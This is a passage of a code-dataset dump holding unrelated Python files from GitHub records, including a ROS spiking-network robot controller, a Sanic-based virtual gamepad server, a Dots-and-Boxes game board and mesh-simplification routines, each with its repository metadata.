Finished...\")\r\nsdk.Exit(context)\r\n","repo_name":"wcmelby/HWP_Characterizations","sub_path":"DRRP_Double_Rotate_and_Take_Image.py","file_name":"DRRP_Double_Rotate_and_Take_Image.py","file_ext":"py","file_size_in_byte":6801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"41636277587","text":"from fpdf import FPDF\nimport sqlite3\nimport jinja2\nimport re\n\n# Define a subclass of FPDF with HTML support\nclass MyFPDF(FPDF):\n pass\n\n# Step 1: Query the database\nconn = sqlite3.connect('mydatabase.db')\ncursor = conn.cursor()\ncursor.execute('SELECT * FROM mytable')\ndata = cursor.fetchall()\n\n# Step 2: Load the jinja2 template from a file\nwith open('mytemplate.html') as f:\n template_string = f.read()\ntemplate = jinja2.Template(template_string)\n\n# Step 3: Render the jinja2 template\nhtml_string = template.render(data=data)\n\n# Step 4: Generate the PDF file\npdf = MyFPDF()\npdf.add_page()\n\n# Parse the HTML string and manually create a table in the PDF\npdf.set_font('Arial', '', 14)\npdf.cell(0, 10, 'My PDF', 0, 1)\npdf.ln(10)\npdf.set_font('Arial', '', 12)\n\n# Find all table rows in the HTML string using a regular expression\npattern = re.compile(r'(.*?)
', re.DOTALL)\nrows = pattern.findall(html_string)\n\n# Loop over the rows and create a table in the PDF\nfor row in rows:\n # Find all table cells in the row using another regular expression\n cell_pattern = re.compile(r'(.*?) | ', re.DOTALL)\n cells = cell_pattern.findall(row)\n for cell in cells:\n pdf.cell(60, 10, cell, 1)\n pdf.ln()\n\npdf.output('myoutput.pdf')\n","repo_name":"acarcastillo/Jinja","sub_path":"code_8.py","file_name":"code_8.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"39321061836","text":"#!/usr/bin/env python\n\n\nimport pyNN.nest as p\nfrom pyNN.random import NumpyRNG, RandomDistribution\nfrom pyNN.utility import Timer\nimport matplotlib.pyplot as plt\nimport pylab\nimport numpy as np\nfrom scipy import signal\n\n\nimport rospy\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import Twist\n\ndef network():\n rospy.init_node('simple_network_node')\n rate = rospy.Rate(10) # 10hz\n #rospy.Subscriber(\"camera/image_processed\", Image, test_callback)\n #rospy.Subscriber(\"camera/rgb/image_raw\", Image, test_callback)\n rospy.Subscriber('camera/image_compressed', Image, test_callback)\n #rospy.Subscriber(\"/chatter\", String, callback)\n rospy.Subscriber(\"/test_image\", Image, test_callback)\n\n rospy.loginfo('starting---------------')\n rospy.spin()\n #while True:\n # rospy.loginfo_throttle(10, \"This message will print every 10 seconds\")\n\ndef gaussian_convolution(spikes,dt):\n #----------- works only after the simulation has run; not online!!!!!!!!\n kernel_size = 10\n gaussian_kernel = signal.gaussian(kernel_size, std=2)\n scaling_factor = 1/np.sum(gaussian_kernel)*1/dt\n gauss_rate = np.convolve(spikes,gaussian_kernel,mode='same')*scaling_factor\n mean_rate = np.mean(gauss_rate)\n return mean_rate\n\ndef test_callback(data_input):\n global message\n message = data_input.data\n rospy.loginfo('=====received data %r', message)\n\n msg_list = list(message)\n\n msg_list= [int(msg.encode('hex'),16) for msg in message]\n #\n #for i in\n #msg_list = int(message.encode('hex'),16)\n\n #print('============= Received image data.',message)\n rospy.loginfo('=====received data %r', msg_list[1])\n timer = Timer()\n dt = 0.1\n p.setup(timestep=dt) # 0.1ms\n\n\n #input = p.Population(1, p.SpikeSourceArray, {'spike_times': [[0,3,6]]}, label='input')\n\n n_input_neurons = len(msg_list) #/4\n rospy.loginfo('====length of input image %r', n_input_neurons)\n\n\n #====================================================================\n # defining the LSM\n\n input_neuron = p.Population(n_input_neurons, p.SpikeSourcePoisson, {'rate':msg_list})\n\n n = 200 # number of cells\n exc_ratio = 0.8 # ratio of excitatory neurons\n n_exc = int(round(n*0.8))\n n_inh = n-n_exc\n celltype = p.Izhikevich()\n exc_cells = p.Population(n_exc, celltype, label=\"Excitatory_Cells\")\n inh_cells = p.Population(n_inh, celltype, label=\"Inhibitory_Cells\")\n\n # initialize with a uniform random distributin\n # use seeding for reproducability\n rngseed = 98766987\n parallel_safe = True\n\n rng = NumpyRNG(seed=rngseed, parallel_safe=parallel_safe)\n\n unifDistr = RandomDistribution('uniform', (-75,-65), rng=rng)\n exc_cells.initialize(v=unifDistr)\n inh_cells.initialize(v=unifDistr)\n\n readout_neurons = p.Population(1, celltype, label=\"readout_neuron\")\n\n\n w_exc = 20. # parameter than can be changed\n w_inh = 80. # parameter than can be changed\n delay_inp = 1\n delay_exc = 1 # defines how long (ms) the synapse takes for transmission\n delay_inh = 1\n\n\n weight_distr_inp = RandomDistribution('uniform',(1,10),rng=rng)\n weight_distr_exc = RandomDistribution('normal', [w_exc, 1e-3], rng=rng)\n weight_distr_inh = RandomDistribution('normal', [w_inh, 1e-3], rng=rng)\n\n\n stat_syn_inp = p.StaticSynapse(weight =weight_distr_inp, delay=delay_inp)\n stat_syn_exc = p.StaticSynapse(weight =weight_distr_exc, delay=delay_exc)\n stat_syn_inh = p.StaticSynapse(weight =weight_distr_inh, delay=delay_inh)\n\n\n\n pconn = 0.01 # sparse connection probability within the reservoir\n input_conn = 0.3 # sparse connections from input to reservoir\n \n exc_conn = p.FixedProbabilityConnector(pconn, rng=rng)\n inh_conn = p.FixedProbabilityConnector(pconn, rng=rng)\n inp_conn = p.FixedProbabilityConnector(input_conn, rng=rng)\n rout_conn = p.AllToAllConnector()\n \n connections = {}\n connections['e2e'] = p.Projection(exc_cells, exc_cells, exc_conn,\n synapse_type=stat_syn_exc, receptor_type='excitatory')\n connections['e2i'] = p.Projection(exc_cells, inh_cells, exc_conn,\n synapse_type=stat_syn_exc,receptor_type='excitatory')\n connections['i2e'] = p.Projection(inh_cells, exc_cells, inh_conn,\n synapse_type=stat_syn_inh,receptor_type='inhibitory')\n connections['i2i'] = p.Projection(inh_cells, inh_cells, inh_conn,\n synapse_type=stat_syn_inh,receptor_type='inhibitory')\n\n\n connections['inp2e'] = p.Projection(input_neuron, exc_cells, inp_conn,\n synapse_type=stat_syn_inp,receptor_type='excitatory')\n connections['inp2i'] = p.Projection(input_neuron, inh_cells, inp_conn,\n synapse_type=stat_syn_inp,receptor_type='excitatory')\n\n connections['e2rout'] = p.Projection(exc_cells, readout_neurons, rout_conn,\n synapse_type=stat_syn_exc,receptor_type='excitatory')\n connections['i2rout'] = p.Projection(inh_cells, readout_neurons, rout_conn,\n synapse_type=stat_syn_inh,receptor_type='inhibitory')\n\n\n #=====================================================================\n # recording and running the network\n\n readout_neurons.record(['v','spikes'])\n p.run(20)\n readout_data= readout_neurons.get_data()\n\n spikes = readout_data.segments[0].spiketrains[0]\n mean_rate = int(gaussian_convolution(spikes,dt))\n rospy.loginfo('=====mean_rate %r', mean_rate) # mean_rate = 64\n rate_command = mean_rate\n # rate coding of the spike train\n\n pub = rospy.Publisher('/cmd_vel_mux/input/teleop', Twist, queue_size=10)\n\n #======================================================================\n # construct the output command\n # we handcrafted the transfer function to be within the joint limits of the robot\n\n command = Twist()\n command.linear.x = np.abs((int(mean_rate)%10-4))*10+0.24 #0.24\n command.angular.z = -(int(mean_rate)%10-4.5)*10\n\t#int(mean_rate)%100/100.*np.pi-np.pi/2\n pub.publish(command)\n\n rospy.loginfo('=====send command %r', command.angular.y)\n\n\n fig_settings = {\n 'lines.linewidth': 0.5,\n 'axes.linewidth': 0.5,\n 'axes.labelsize': 'small',\n 'legend.fontsize': 'small',\n 'font.size': 8\n }\n plt.rcParams.update(fig_settings)\n fig1=plt.figure(1, figsize=(6,8))\n\n def plot_spiketrains(segment):\n for spiketrain in segment.spiketrains:\n y = np.ones_like(spiketrain) * spiketrain.annotations['source_id']\n plt.plot(spiketrain, y, '.')\n plt.ylabel(segment.name)\n plt.setp(plt.gca().get_xticklabels(), visible=False)\n\n def plot_signal(signal, index, colour='b'):\n label = \"Neuron %d\" % signal.annotations['source_ids'][index]\n plt.plot(signal.times, signal[:, index], colour, label=label)\n plt.ylabel(\"%s (%s)\" % (signal.name, signal.units._dimensionality.string))\n plt.setp(plt.gca().get_xticklabels(), visible=False)\n plt.legend()\n\n print(\"now plotting the network---------------\")\n rospy.loginfo('--------now plotting---------------')\n n_panels = sum(a.shape[1] for a in readout_data.segments[0].analogsignalarrays) + 2\n plt.subplot(n_panels, 1, 1)\n plot_spiketrains(readout_data.segments[0])\n panel = 3\n for array in readout_data.segments[0].analogsignalarrays:\n for i in range(array.shape[1]):\n plt.subplot(n_panels, 1, panel)\n plot_signal(array, i, colour='bg'[panel%2])\n panel += 1\n plt.xlabel(\"time (%s)\" % array.times.units._dimensionality.string)\n plt.setp(plt.gca().get_xticklabels(), visible=True)#\n\n #plt.show()\n #fig1.show()\n #plt.savefig(\"~/Spiking-Neural-Networks-on-Robotino/network_output.jpg\")\n\n\n\nif __name__ == '__main__':\n try:\n network()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"Erzcoder/Spiking-Neural-Networks-on-Robotino","sub_path":"src/neural_network/src/lsm_node.py","file_name":"lsm_node.py","file_ext":"py","file_size_in_byte":8058,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
+{"seq_id":"24239130481","text":"\"\"\" Nombre: Alejandro Tejada\nCurso: Inteligencia Artificial\nFecha: 28/05/2020\nPrograma: Tablero.py\nPropósito: dibujar el tablero y su lógica \"\"\"\n\n#zona de librerías\n#------------------------\nfrom random import *\n#--------------------------\n#la clase game se encarga de manejar loq ue sucede en el tablero\nclass Tablero: \n def __init__(self, Mat, dimX, dimY):\n self.Mat = Mat\n self.dimX = dimX\n self.dimY = dimY\n\n #se instancia el tablero con las dimensiones\n def Initiate(self): \n for i in range(0, self.dimY):\n R = []\n for j in range(0, self.dimX):\n if i % 2 == 1 and j % 2 == 1:\n #! se llena de valores random lo de adentro\n R.append(randint(1, 9))\n elif i % 2 == 0 and j % 2 == 0:\n #mprimiendo los asteriscos\n R.append('*')\n else:\n R.append(' ') # se agregan espacio\n self.Mat.append(R)\n\n def Get_matrix(self): # Matriz se obtiene\n ans = []\n for i in range(0, self.dimY):\n R = []\n for j in range(0, self.dimX):\n R.append(self.Mat[i][j])\n ans.append(R)\n return ans\n\n # se duibuja el tablero\n def Draw_mat(self): \n\n if self.dimX > 9:\n print(\" \", end='')\n print(\" \", end='')\n for i in range(0, self.dimX):\n print(str(i), end=' ')\n print()\n\n if self.dimX > 9:\n print(\" \", end='')\n print(\" \", end='')\n for i in range(0, self.dimX + 1):\n print(\"___\", end='')\n print()\n for j in range(self.dimY):\n if self.dimX > 9 and j < 10:\n print(\" \", end='')\n print(str(j) + \"| \", end='')\n for z in range(self.dimX):\n print(str(self.Mat[j][z]), end=' ')\n print()\n print(\" _________________________\\n\")\n\n def Get_currentState(self):\n return Tablero(self.Get_matrix(), self.dimX, self.dimY)\n\n #se aplican las acciones al tablero\n def action(self, i, j): \n Sum = 0\n\n if j % 2 == 0 and i % 2 == 1:\n self.Mat[j][i] = '-'\n if j < self.dimY - 1:\n if self.Mat[j+2][i] == '-' and self.Mat[j+1][i+1] == '|' and self.Mat[j+1][i-1] == '|':\n Sum += self.Mat[j+1][i]\n if j > 0:\n if self.Mat[j-2][i] == '-' and self.Mat[j-1][i+1] == '|' and self.Mat[j-1][i-1] == '|':\n Sum += self.Mat[j-1][i]\n\n else:\n self.Mat[j][i] = '|'\n if i < self.dimX - 1:\n if self.Mat[j][i+2] == '|' and self.Mat[j+1][i+1] == '-' and self.Mat[j-1][i+1] == '-':\n Sum += self.Mat[j][i+1]\n if i > 0:\n if self.Mat[j][i-2] == '|' and self.Mat[j+1][i-1] == '-' and self.Mat[j-1][i-1] == '-':\n Sum += self.Mat[j][i-1]\n return Sum\n","repo_name":"tej17584/Dots-and-Boxes-AI-Python","sub_path":"Tablero.py","file_name":"Tablero.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"74692340206","text":" ###########################################################\n # Computer Project #4\n #\n # Main Function\n # Display opening message\n # call 2 functions (Get character, Find state)\n # call Function 1 (Get character) \n # input a character that meets correct length\n # call Function 2 (Find state)\n # determine state based on character\n # loop while character is not empty string\n # display message if whether user is or is not laughing\n ###########################################################\n\n\ndef get_ch():\n \"\"\"\n Takes a character as input and tries again if the input is invalid\n \"\"\"\n user_input = input('Enter a character or press the Return key to finish: ')\n if len(user_input) > 1:\n print ('Invalid input, please try again.')\n return 'invalid'\n\n else:\n return user_input\n\n\ndef find_state(state, ch):\n \n \"\"\"\n Determines and assigns state of character based on character entered and\n state = 5 if chracter is invalid.\n \"\"\"\n # state 5 is an invalid entry\n \n if state == '1':\n if ch == 'h':\n state = '2'\n else:\n state = '5'\n \n \n elif state == '2':\n if ch == 'a' or ch == 'o':\n state = '3'\n else:\n state = '5'\n \n \n elif state == '3':\n if ch == '!':\n state = '4'\n \n elif ch == 'h':\n state = '2'\n \n elif ch == 'a' or ch == 'o':\n state = '3'\n \n else:\n state = '5'\n \n elif state == '4':\n if ch != '':\n state = '5'\n else:\n state = '4'\n \n \n return state\n \n\ndef main():\n \"\"\"\n Calls get_ch function and find_state function. Loops while character is\n not invalid. Displays whether user is or is not laughing based on state.\n \"\"\"\n state = '1'\n #user will always begin with state 1\n final_ch = ''\n #final_ch begins with empty string to keep track of characters \n ch = 'a'\n print ('I can recognize if you are laughing or not.')\n print('Please enter one character at a time.\\n')\n # Opening message \n while ch != '': \n ch = get_ch()\n if ch != 'invalid':\n state = find_state(state, ch)\n ch = str(ch)\n final_ch += ch\n #loop while character does not equal empty string\n \n \n if state == '4':\n print( \"You entered \", final_ch)\n print('You are laughing.')\n \n if state == '5':\n print (\"You entered \", final_ch)\n print('You are not laughing.')\n\nmain()","repo_name":"tialeefowlkes/python-project","sub_path":"proj04.py","file_name":"proj04.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"4568607517","text":"# 파일 출력 및 corpus, s_corpus 저장\ndef open_file(corpus, s_corpus, origin_corpus):\n\tf = open(\"../file/sample-sequence.txt\", \"r\")\n\n\twhile True:\n\t\tstate = f.readline()\n\t\tif not state:\n\t\t\tbreak\n\t\tstate = state.strip()\n\t\torigin_corpus.append(state)\n\t\tif state not in corpus:\n\t\t\tcorpus.append(state)\n\t\t\tstate_split = state.split(\"_\")\n\t\t\tfor i in state_split:\n\t\t\t\tif i not in s_corpus:\n\t\t\t\t\ts_corpus.append(i)\n\n\treturn corpus, s_corpus, origin_corpus\n\ndef write_file(result):\n\tf = open(\"../file/result.prism\", 'w')\n\tf.write(result)\n\tf.close","repo_name":"josuhee/PrismModelChecker","sub_path":"src/io_file.py","file_name":"io_file.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"37385711837","text":"from logging_setup import LOGGER\nimport json\nimport copy\nimport argparse\nfrom layers.interface_layer import InterfaceHandler\n\n\nclass TestExecutor:\n def __init__(self):\n self.interface_manager = InterfaceHandler()\n self.args = self.parse_args()\n\n with open(\"configuration.json\") as f:\n self.configuration = json.load(f)\n self.tools = self.configuration[\"tools\"]\n\n @staticmethod\n def parse_args():\n LOGGER.info(\"Parse all args...\")\n arg_parser = argparse.ArgumentParser(description='Test Result Filter')\n\n arg_parser.add_argument('-tr', dest='tr_path',\n help='test results path',\n required=False)\n arg_parser.add_argument('-tc',\n dest='test_cases',\n help='test case list',\n required=False)\n\n args = arg_parser.parse_args()\n args = vars(args)\n return args\n\n def initialize_interface_layer(self):\n LOGGER.info(\"Initialize interface layer...\")\n for tool in self.configuration[\"tools\"]:\n module_import = __import__(\"modules.%s.a_%s\" % (tool, tool),\n fromlist=[\"Abstract%s\" % tool])\n # Get Class Object\n module_class = getattr(module_import,\n 'Abstract%s' % tool)\n # Set Class as attribute for self, in order to be accessible from here\n setattr(self, tool, module_class(self.configuration[tool],\n copy.deepcopy(self.args)))\n # Share Interface manager\n self.__getattribute__(tool).interface_manager = self.interface_manager\n # Collect Interfaces\n self.interface_manager.collect(tool_name=tool,\n object_type=self.__getattribute__(tool))\n\n def initialize_tool_set(self):\n \"\"\"\n Initialize all tools\n :return:\n \"\"\"\n LOGGER.info(\"Initialize all tools...\")\n for tool in self.tools:\n self.interface_manager.call(\n method_name=\"INIT\",\n tool_name=tool,\n args=self.args\n )\n for tool in self.tools:\n self.interface_manager.call(\n method_name=\"PREPARE\",\n tool_name=tool,\n args=self.args\n )\n\n def stop_tool_set(self):\n \"\"\"\n Stop all tools\n :return:\n \"\"\"\n LOGGER.info(\"Stop all tools...\")\n for tool in self.tools:\n self.interface_manager.call(\n method_name=\"STOP\",\n tool_name=tool,\n args=self.args\n )\n\n def keyword_read_dtc(self):\n \"\"\"\n Read DTC keyword\n :return:\n \"\"\"\n return self.interface_manager.call(method_name=\"dia.read_dtc\")\n\n def keyword_send_diagnostic_request(self):\n \"\"\"\n Send dia request DTC\n :return:\n \"\"\"\n return self.interface_manager.call(method_name=\"dia.diagnostic_request\")\n\n def run(self, tests: list):\n \"\"\"\n Runner which run all tests\n :param tests:\n :return:\n \"\"\"\n for test in tests:\n LOGGER.info(\"Start test case\")\n for step in test:\n keyword = getattr(self, f\"keyword_{step}\")\n keyword()\n LOGGER.info(\"Stop test case\")\n\n\nif __name__ == \"__main__\":\n te = TestExecutor()\n te.initialize_interface_layer()\n te.initialize_tool_set()\n te.run([[\"read_dtc\", \"send_diagnostic_request\"],\n [\"send_diagnostic_request\", \"read_dtc\"],\n [\"read_dtc\"]])\n te.stop_tool_set()\n","repo_name":"ValeriuMorari/DissertationExample","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"73289116845","text":"# Map function : map(function,sequence)\n# To run a function along a given list and print the results in list or tuple.\n\n# def mul(n):\n# return n*n\n\nmul=lambda n:n*n\nnum=(1,2,3,4)\nresult=map(mul,num) #map(function,sequence) - SYNDAX\nprint(list(result))\n\n# num1=[1,2,3,4]\n# num2=[5,6,7,8]\n# result=map(lambda x,y:x+y,num1,num2)\n# print(list(result))\n\nnum1=[1,2,3,4]\nnum2=[5,6,7,8]\nresult=map(lambda x,y:x+y,num1,num2)\nprint(list(result))\n\n# Print length of each string in list.\n\nfruits=['apple','orange','mango','banana','jackfruit']\nresult=map(len,fruits)\nprint(list(result))\n\n# Print each letters as a list.\n\nfruits=['apple','orange','mango','banana','jackfruit']\nresult=map(list,fruits)\nprint(list(result))\n\n\n# ::::::: Important ::::::::\n\n\n# Map\n# Filter\n\n# lst=[1,2,3,4,5]\n# newlst=map(lambda x:x*x,lst)\n# print(list(newlst))\n#\n# newlst1=filter(lambda x:x>2,lst)\n# print(list(newlst1))","repo_name":"AthulkrishnaKp/Python-Django","sub_path":"Module 2 Start/Functions/Map_Function.py","file_name":"Map_Function.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"21548675870","text":"from pynput.keyboard import Key, Controller\nfrom sanic import Sanic\nfrom sanic.response import empty, json,file,text,empty\nimport vgamepad as vg\nimport time\nimport threading\n\napp = Sanic(\"Joystick\")\nkeyboard = Controller()\n\ndata={\n \"x\":0,\n \"y\":0,\n \"z\":0,\n \"vx\":0,\n \"vy\":0,\n \"sl\":0,\n \"break\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_DPAD_UP},\n \"parking\":{\"active\":False,\"ctrl\":True,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_DPAD_DOWN},\n \"landing gear\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_DPAD_LEFT},\n \"lights\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_DPAD_RIGHT},\n \"simulation speed\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_START},\n \"extra 2\":{\"active\":False,\"key\":\"\"},\n \"extra 3\":{\"active\":False,\"key\":\"\"},\n \"extra 4\":{\"active\":False,\"key\":\"\"},\n \"flap up\":{\"active\":False,\"shift\":True,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_LEFT_THUMB},\n \"flap down\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_RIGHT_THUMB},\n \"spoiler arm\":{\"active\":False,\"shift\":True,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_LEFT_SHOULDER},\n \"spoiler full\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_RIGHT_SHOULDER},\n # \"neutral\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_GUIDE}, #not\n \"reverse\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_A},\n \"next view\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_B},\n \"next seat\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_X},\n \"minus\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_Y},\n \"plus\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_BACK},\n \"reset\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_GUIDE},\n \"running\":True\n}\n\n@app.post('/data')\nasync def manage_data(request):\n \n data[\"vx\"]=float(request.form[\"0\"][0])\n data[\"vy\"]=float(request.form[\"1\"][0])\n data[\"x\"]=float(request.form[\"2\"][0])\n data[\"y\"]=float(request.form[\"3\"][0])\n data[\"z\"]=float(request.form[\"4\"][0])\n data[\"sl\"]=float(request.form[\"5\"][0])\n\n keys=list(data.keys())[6:len(data)-1]\n i=6\n for key in keys:\n data[key][\"active\"]=request.form[str(i)][0]==\"True\"\n i+=1\n\n return json({})\n\n\n\n@app.route(\"/\")\nasync def test_sockets(request):\n return await file('./test.html')\n\n@app.get('/disconnect')\nasync def manage_disconnection(request):\n data[\"running\"]=False\n return json({})\n\n@app.get(\"/connect\")\nasync def manage_connect(request):\n data[\"running\"]=True\n controllerT=threading.Thread(target=runController)\n controllerT.start()\n return json({})\n\ndef runServer():\n app.run(host=\"0.0.0.0\",port=\"5000\",debug=False,access_log=False)\n\ndef runController():\n gamepad = vg.VX360Gamepad()\n while data[\"running\"]:\n gamepad.left_joystick_float(x_value_float=-data[\"x\"], y_value_float=data[\"z\"])\n gamepad.right_joystick_float(x_value_float=data[\"vx\"], y_value_float=-data[\"vy\"])\n \n gamepad.left_trigger_float(value_float=data[\"sl\"])\n gamepad.right_trigger_float(value_float=-data[\"sl\"]+1)\n\n keys=list(data.keys())[6:len(data)-1]\n for key in keys:\n if data[key][\"key\"]==\"\":\n continue\n if data[key][\"active\"]:\n gamepad.press_button(button=data[key][\"key\"])\n else:\n gamepad.release_button(button=data[key][\"key\"])\n \n gamepad.update()\n time.sleep(0.01)\n\nif __name__ == '__main__':\n runServer()\n","repo_name":"EdgarPozas/joystick-mobile","sub_path":"server-sanic/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"4113494670","text":"import torch\nimport numpy as np\nfrom .core import to_hom\nfrom .geometry_basic import get_edges, edge_contraction\n\ndef compute_incident_triangles(f):\n \"\"\"\n compute the incident triangles per vertex\n :param v: vertices of the mesh\n :param f: faces of the mesh\n :return: list of lists of incident triangles per vertex\n \"\"\"\n incident_triangles = [[] for _ in range(np.unique(f).shape[0])]\n for i, face in enumerate(f):\n for vertex in face:\n incident_triangles[vertex].append(i)\n return incident_triangles\n\ndef compute_quadtratic_surface(v, f):\n \"\"\"\n given a mesh, compute the quadratic surface coefficients per vertex in a tensor of size Vx4x4\n the per vertex quadratic surface is computed from the sum of quadtratic surfaces of incident faces to each vertex\n :param v: vertices of the mesh\n :param f: faces of the mesh\n :return: tensor of size Vx4x4 of quadtratic surface coefficients per vertex\n \"\"\"\n e1 = v[f[:, 1]] - v[f[:, 0]]\n e2 = v[f[:, 2]] - v[f[:, 0]]\n e1 = e1 / np.linalg.norm(e1, axis=-1)[: ,None]\n e2 = e2 / np.linalg.norm(e2, axis=-1)[: ,None]\n n = np.cross(e1, e2)\n n = n / np.linalg.norm(n, axis=-1)[: ,None]\n d = ((-v[f[:, 0]])[:, None, :] @ n[:, :, None]).squeeze()\n Qf = np.zeros((f.shape[0], 4, 4), dtype=np.float32)\n Qf[:, :3, :3] = n[:, :, None] @ n[:, None, :]\n Qf[:, -1, :-1] = d[:, None] * n\n Qf[:, :-1, -1] = Qf[:, -1, :-1]\n Qf[:, -1, -1] = d * d\n Qv = distribute_field(v, f, Qf)\n return Qv\n\ndef compute_contraction_costs(v_hats, valid_pairs, Qv):\n \"\"\"\n compute the costs of contracting the valid pairs\n :param v_hats: the new vertices after contraction\n :param valid_pairs: the valid pairs of vertices to contract\n :param Qv: the quadratic surface coefficients per v_hat\n :return: the costs of contracting the valid pairs\n \"\"\"\n v_hats = to_hom(v_hats)\n Q_hats = np.sum(Qv[valid_pairs], axis=1)\n return (v_hats[:, None, :] @ (Q_hats @ v_hats[:, :, None])).squeeze()\n\ndef compute_v_hats(v, valid_pairs, Qv):\n \"\"\"\n computes the optimal vertex positions for each valid pair of vertices given the quadratic surface coefficients of contracting the pairs\n :param v: vertices of the mesh\n :param valid_pairs: list of valid pairs of vertices\n :param Qv: tensor of size Vx4x4 of quadtratic surface coefficients per vertex\n :return: tensor of size Vx3 of (almost) optimal vertex positions\n \"\"\"\n v_hats = np.zeros((valid_pairs.shape[0], 3), dtype=np.float32)\n Q_hats = np.sum(Qv[valid_pairs], axis=1)\n Q_hats[:, -1, :] = np.array([0, 0, 0, 1])[None, :]\n mask = np.linalg.det(Q_hats) != 0\n v_hats[mask] = (np.linalg.inv(Q_hats[mask]) @ np.array([0, 0, 0, 1])[None, :, None]).squeeze()[:, :3] # d(cost)/d(v_hat) = 0\n # note: orig paper searches for the minimum along the segment between the two vertices if Q_hat is singular\n v_hats[~mask] = np.mean(v[valid_pairs[~mask]], axis=1) # if Q_hats is singular, use the mean of the two vertices\n return v_hats\n\ndef qem(v: np.ndarray, f: np.ndarray, budget: int):\n \"\"\"\n A slightly naive (and slow) implementation of \"Surface Simplification Using Quadric Error Metrics\", 1997\n \"\"\"\n if v.ndim != 2 or v.shape[-1] != 3:\n raise ValueError(\"v must be V x 3 array\")\n if f.ndim != 2 or f.shape[-1] != 3:\n raise ValueError(\"f must be F x 3 array\")\n if budget < 4:\n raise ValueError(\"minimum budget is 3 triangles\")\n while f.shape[0] > budget:\n print(\"current # faces: {}\".format(f.shape[0]))\n valid_pairs = get_edges(f)\n Qv = compute_quadtratic_surface(v, f)\n v_hats = compute_v_hats(v, valid_pairs, Qv)\n costs = compute_contraction_costs(v_hats, valid_pairs, Qv)\n lowest_cost = np.argmin(costs)\n v, f = edge_contraction(v, f, valid_pairs[lowest_cost], v_hats[lowest_cost])\n return v, f\n\ndef distribute_field(v, f, field, avg=False):\n \"\"\"\n given a mesh, and a field shaped (F, ...), distribute it to the vertices of the mesh by summing up the values of the incident faces\n :param v: vertices of the mesh (V, 3)\n :param f: faces of the mesh (F, 3)\n :param field: field of size (F, ...) dtype float32\n :param avg: if True, the field is averaged over the incident faces instead of summed up\n :return: the field distributed over the vertices (V, ...)\n \"\"\"\n if field.shape[0] != f.shape[0]:\n raise ValueError(\"field must have the same number of elements as faces\")\n if field.dtype != np.float32:\n raise ValueError(\"field must be of dtype float32\")\n # compute the incident triangles per vertex\n incident_triangles = compute_incident_triangles(f)\n # compute the scalar field per vertex\n field_per_vertex = np.zeros((v.shape[0], *field.shape[1:]), dtype=np.float32)\n for i, face in enumerate(f):\n for vertex in face:\n field_per_vertex[vertex] += field[i]\n if avg:\n n_incident_triangles = np.array([len(triangles) for triangles in incident_triangles])\n field_per_vertex /= n_incident_triangles[..., None]\n return field_per_vertex\n\ndef distribute_scalar_field(num_vertices, f, per_face_scalar_field, avg=False):\n \"\"\"\n computes a scalar field per vertex by summing / averaging the incident face scalar field\n :param num_vertices: number of vertices in the mesh\n :param f: faces of the mesh\n :param per_face_scalar_field: scalar field of size F\n :param avg: if True, the field is averaged over the incident faces instead of summed up\n :return: scalar field of size V\n \"\"\"\n device = f.device\n incident_face_areas = torch.zeros([num_vertices, 1], device=device)\n f_unrolled = f.flatten()\n face_indices_repeated_per_vertex = torch.arange(f.shape[0], device=f.device)\n face_indices_repeated_per_vertex = torch.repeat_interleave(face_indices_repeated_per_vertex, repeats=3)\n face_areas_repeated_per_face = per_face_scalar_field[face_indices_repeated_per_vertex].unsqueeze(-1)\n incident_face_areas = torch.index_add(incident_face_areas, dim=0, index=f_unrolled,\n source=face_areas_repeated_per_face)\n if avg:\n neighbors = torch.index_add(torch.zeros_like(incident_face_areas), dim=0, index=f_unrolled,\n source=torch.ones_like(face_areas_repeated_per_face))\n incident_face_areas = incident_face_areas / neighbors\n return incident_face_areas\n\ndef distribute_vector_field(num_vertices, f, per_face_vector_field):\n \"\"\"\n computes a vector field per vertex by summing the incident face vector field\n :param num_vertices: number of vertices in the mesh\n :param f: faces of the mesh\n :param per_face_vector_field: vector field of size Fx3\n :return: vector field of size Vx3\n \"\"\"\n device = f.device\n incident_face_areas = torch.zeros([num_vertices, 